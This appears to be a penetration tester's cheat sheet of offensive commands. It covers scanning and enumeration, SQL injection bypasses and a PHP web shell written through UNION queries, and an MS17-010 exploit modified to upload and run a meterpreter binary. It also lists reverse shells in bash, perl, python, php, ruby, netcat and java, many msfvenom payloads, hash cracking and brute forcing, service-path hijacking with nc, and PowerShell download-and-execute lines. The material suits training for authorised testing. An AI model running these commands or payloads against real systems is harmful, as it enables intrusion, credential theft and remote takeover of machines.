Port Scanning

nmap -sC -sV -p- -oA nmap/all 
nmap -sU -vv -oA nmap/alludp
masscan -p22,80,445

Port Knocking

for x in 7000 8000 9000; do nmap -Pn --max-retries 0 -p $x; done


# Gobuster 3
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u -x html,php -t 20
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u -x html,php -k

curl -v
curl -k -v
curl -A "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

curl -v -X OPTIONS
davtest -url

nikto -h
uniscan -u -qweds

nmap -sV -p 443 --script=ssl-heartbleed
sslyze --regular

# Shellshock
nmap -sV -p- --script http-shellshock
nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls

# WordPress
wpscan --url --enumerate u

# Drupal
# https://github.com/droope/droopescan
droopescan scan drupal -u

# Joomla
# https://github.com/rezasp/joomscan
joomscan --url

# sqlmap crawl  
sqlmap -u --crawl=1

# sqlmap dump database  
sqlmap -u --dbms=mysql --dump

# sqlmap shell  
sqlmap -u --dbms=mysql --os-shell

# Upload php command injection file
union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'

# Load file
union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6

# Bypass
' or 1=1 LIMIT 1 --
' or 1=1 LIMIT 1 -- -
' or 1=1 LIMIT 1#
'or 1#
' or 1=1 --
' or 1=1 -- -

# PHP command injection from GET Request
<?php echo system($_GET["cmd"]);?>

# Alternative
<?php echo shell_exec($_GET["cmd"]);?>


nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse

nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse

smbmap -u jsmith -p password1 -d workgroup -H

enum4linux -av

rpcclient -U ""

smbclient //
apt-get install -y cifs-utils
mount -t cifs /test

# Manual MS17-010 exploitation
# https://github.com/worawit/MS17-010
msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=1337 -f exe > blue.exe

# Before
#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')

# After
smb_send_file(smbConn, 'blue.exe', 'C', '/blue.exe')
service_exec(conn, r'cmd /c c:\\blue.exe')

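# smbver.sh
# Usage: ./smbver.sh RHOST [RPORT]   (RPORT defaults to 139)
# Prints "RHOST: " followed by the Samba version string sniffed on tap0 while
# smbclient asks the target for its share list.
if [ -z "$1" ]; then
  echo "Usage: ./smbver.sh RHOST {RPORT}" >&2
  exit 1   # usage error must not exit 0
fi
rhost=$1
rport=${2:-139}   # default SMB-over-NetBIOS port when no RPORT given
# Background capture: up to 10 packets from the target's SMB port; the grep/tr
# chain pulls the "UnixSamba..." banner out of the ASCII dump and strips the
# trailing newline. Started first so it is listening before smbclient connects.
tcpdump -s0 -n -i tap0 src "$rhost" and port "$rport" -A -c 10 2>/dev/null \
  | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' &
# Print the prefix in the foreground (printf, not echo -n, for portability).
printf '%s: ' "$rhost"
# Trigger a session so the server sends its banner; smbclient's own output is discarded.
printf 'exit\n' | smbclient -L "$rhost" >/dev/null 2>&1
echo "" && sleep .1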

nmap --script=samba-vuln-cve-2012-1182  -p 139



onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings_onesixtyone.txt public

snmpwalk -v1 -c public


nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount

mount -t nfs /mnt/nfs

# Resources 
# https://github.com/bonsaiviking/NfSpy

SSH Tunneling

# https://github.com/sshuttle/sshuttle
sshuttle -vvr <user>@<gateway>

# Local port forwarding
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>

# Remote port forwarding
ssh <gateway> -R <remote port to bind>:<local host>:<local port>

# Dynamic port forwarding
ssh -D <local proxy port> -p <remote port> <target>

# Plink local port forwarding
plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>

Brute Force

# /etc/shadow
unshadow passwd shadow > unshadow.db
john unshadow.db --wordlist=/usr/share/wordlists/rockyou.txt

samdump2 SYSTEM SAM > winhashes.txt
john --format=LM --wordlist=/usr/share/wordlists/rockyou.txt winhashes.txt

# Hashcat SHA512 $6$ shadow file  
hashcat -m 1800 -a 0 hash.txt rockyou.txt --username

# Hashcat MD5 $1$ shadow file  
hashcat -m 500 -a 0 hash.txt rockyou.txt --username

# Hashcat MD5 Apache webdav file  
hashcat -m 1600 -a 0 hash.txt rockyou.txt

# Hashcat SHA1  
hashcat -m 100 -a 0 hash.txt rockyou.txt --force

# Hashcat WordPress  
hashcat -m 400 -a 0 --remove hash.txt rockyou.txt

hydra -l username -P /usr/share/wordlists/rockyou.txt http-post-form "/portal/xlogin/:user=^USER^&pass=^PASS^:invalid login"

hydra -l username -P /usr/share/wordlists/rockyou.txt https-post-form "/portal/xlogin/:user=^USER^&pass=^PASS^:S=302"

hydra -l username -P /usr/share/wordlists/fasttrack.txt ssh://
hydra -l username -P /usr/share/wordlists/fasttrack.txt
hydra -l username -P /usr/share/wordlists/fasttrack.txt rdp://


# Bash
bash -i >& /dev/tcp/ 0>&1

# Perl
perl -e 'use Socket;$i="";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php -r '$sock=fsockopen("",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

# Ruby
ruby -rsocket -e'f=TCPSocket.open("",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

# Netcat
nc -e /bin/sh 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f

# Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])

# PHP reverse shell  
msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=4443 -f raw -o shell.php

# Java WAR reverse shell  
msfvenom -p java/shell_reverse_tcp LHOST= LPORT=4443 -f war -o shell.war

# Linux bind shell  
msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai

# FreeBSD x64 reverse shell  
msfvenom -p bsd/x64/shell_reverse_tcp LHOST= LPORT=4443 -f elf -o shell.elf

# Linux C reverse shell  
msfvenom  -p linux/x86/shell_reverse_tcp LHOST= LPORT=4443 -e x86/shikata_ga_nai -f c

# Windows non staged reverse shell  
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe

# Windows Staged (Meterpreter) reverse shell  
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe

# Windows Python reverse shell  
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4443 EXITFUNC=thread -f python -o shell.py

# Windows ASP reverse shell  
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp

# Windows ASPX reverse shell
msfvenom -f aspx -p windows/shell_reverse_tcp LHOST= LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx

# Windows JavaScript reverse shell with nops  
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4443 -f js_le -e generic/none -n 18

# Windows Powershell reverse shell  
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1

# Windows reverse shell excluding bad characters  
msfvenom -p windows/shell_reverse_tcp -a x86 LHOST= LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e x86/shikata_ga_nai

# Windows x64 reverse shell  
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=4443 -f exe -o shell.exe

# Windows reverse shell embedded into plink  
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

Windows Privilege Escalation

# What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

# Get the hostname and username (if available)
echo %username%

# Get users
net users
net user [username]

# Networking stuff
ipconfig /all

# Printer?
route print

# ARP-arific
arp -A

# Active network connections
netstat -ano

# Firewall fun (Win XP SP2+ only)
netsh firewall show state
netsh firewall show config

# Scheduled tasks
schtasks /query /fo LIST /v

# Map running processes to the services they host, then list started services
tasklist /SVC
net start

# Driver madness

# WMIC fun (Win 7/8 -- XP requires admin)
wmic /?

# WMIC: check patch level
wmic qfe get Caption,Description,HotFixID,InstalledOn

# Search the installed patches for a given KB
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."

# AlwaysInstallElevated fun
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

# Other commands to run to hopefully get what we need
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# Service permissions
sc query
sc qc [service_name]

# Accesschk stuff
# https://github.com/ankh2054/windows-pentest/tree/master/Privelege
# accesschk seems to get stuck on certain machines without /accepteula
accesschk.exe /accepteula 
accesschk.exe /accepteula -ucqv [service_name] 
accesschk.exe /accepteula -uwcqv "Authenticated Users" * 
accesschk.exe /accepteula -ucqv [service_name]

# Find all weak folder permissions per drive.
accesschk.exe /accepteula -uwdqs Users c:\
accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\

# Find all weak file permissions per drive.
accesschk.exe /accepteula -uwqs Users c:\*.*
accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*

# Binary planting
sc config [service_name] binpath= "C:\nc.exe -nv [RHOST] [RPORT] -e C:\WINDOWS\System32\cmd.exe"
sc config [service_name] obj= ".\LocalSystem" password= ""
sc qc [service_name] (to verify!)
net start [service_name]

# Search for passwords
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

sc qc upnphost
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 1234 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost

# If it fails because of a missing dependency, run the following:
sc config SSDPSRV start= auto
net start SSDPSRV
net start upnphost

# Or remove the dependency:
sc config upnphost depend= ""

# runas not working and have credentials? 
# runas.ps1
$username = 'user'
$password = 'password'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process nc.exe -e cmd.exe 4444

powershell -ExecutionPolicy Bypass -File runas.ps1

powershell "IEX(New-Object Net.WebClient).downloadString('')"

powershell "(New-Object System.Net.WebClient).Downloadfile('', 'shell.exe')"

certutil -urlcache -f shell.exe

# Simple aspx shell
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("")
o = cmd.StdOut.Readall()

# Resources
# https://www.fuzzysecurity.com/tutorials/16.html
# https://guif.re/windowseop
# https://github.com/FuzzySecurity/PowerShell-Suite
# https://github.com/samratashok/nishang
# https://github.com/411Hall/JAWS
# https://github.com/PowerShellMafia/PowerSploit
# https://github.com/rasta-mouse/Sherlock
# https://github.com/ohpe/juicy-potato

Linux Privilege Escalation

# Run inside the reverse shell to spawn a PTY
python -c 'import pty; pty.spawn("/bin/bash")'

# Ctrl-Z
# In Kali
stty raw -echo && fg

# In reverse shell
export SHELL=bash
export TERM=xterm-256color

# Search for SUID
find / -perm -u=s -type f 2>/dev/null

# $PATH manipulation for SUID
cd /tmp
echo "/bin/sh" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH

# Writable /etc/passwd
openssl passwd -1 -salt user pass123
su - user

# Resources
# https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
# https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py
# https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
# https://guif.re/linuxeop
# https://www.hackingarticles.in/linux-privilege-escalation-via-automated-script/
# https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/
# https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/
# https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/
# https://gtfobins.github.io/

Buffer Overflow

# Payload
payload = "\x41" * <length> + <ret_address> + "\x90" * 16 + <shellcode> + "\x43" * <remaining_length>

# Pattern create
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <length>

# Pattern offset
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <length> -q <address>

# nasm
nasm > jmp eax

# Bad characters
badchars = (
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )

Client Side Attack

/usr/lib/jvm/java-8-openjdk-i386/bin/javac -source 1.7 -target 1.7 Java.java

echo "Permissions: all-permissions" > /root/manifest.txt

/usr/lib/jvm/java-8-openjdk-i386/bin/jar cvf Java.jar Java.class

/usr/lib/jvm/java-8-openjdk-i386/bin/keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass password123

/usr/lib/jvm/java-8-openjdk-i386/bin/jarsigner -keystore mykeystore -storepass password123 -keypass mykeypass -signedjar SignedJava.jar Java.jar signapplet

cp Java.class SignedJava.jar /var/www/html/